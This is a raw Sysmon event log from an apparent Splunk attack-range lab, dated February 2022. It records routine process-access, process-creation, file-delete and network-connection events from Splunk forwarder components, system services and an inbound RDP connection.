11:04:19.280{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.280{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.280{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.280{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.279{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-14B3-6216-A606-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.278{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14B3-6216-A606-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.276{C8EA50B7-14B3-6216-A606-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:18.996{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3883FB322FE4F9276BDD2BA9594E2587,SHA256=2F4712026CA934B3D42B90CD458568DF1A557A0BB3448A5740F538D00872365C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:19.145{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-148MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:19.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4292D12BD5DA07477ADD74B2FBBB4218,SHA256=CF5C1F62366825706F6E054EF4BD37A4C264AE028093A5FC68B5E669F45C4138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:20.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5BEB387CDE9DF8F156A8303C2883CD6,SHA256=709B3C6AD3EC07B369189EABC09F2E5B61BB589222853ECF7A03FFE5716FBAEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.744{C8EA50B7-14B4-6216-A806-000000003802}19726760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14B4-6216-A806-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-14B4-6216-A806-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.413{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14B4-6216-A806-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.417{C8EA50B7-14B4-6216-A806-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.278{C8EA50B7-14B3-6216-A706-000000003802}33327120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:20.014{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0F72B0ADACFBC51E67606EA0D885661,SHA256=BFBEA7D691A6C42C38C85F0CADD5DA73FE5028AA75F443474FA51DB8B068D6FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:19.498{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx55466-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:21.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1776016B438795759063C9861C6F4BC7,SHA256=B0A370C9688E1A50C21B49EF36B781A5EB77A46039A809706FD013D4DC859F72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656796CC9EFA9AC719DA055B7493FE52,SHA256=7266A07E0825B050DE08170C55B3754E16DD6B420723307BDAD945F90E39622E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:18.632{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49186-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14B5-6216-A906-000000003802}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-14B5-6216-A906-000000003802}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.013{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14B5-6216-A906-000000003802}884C:\Program 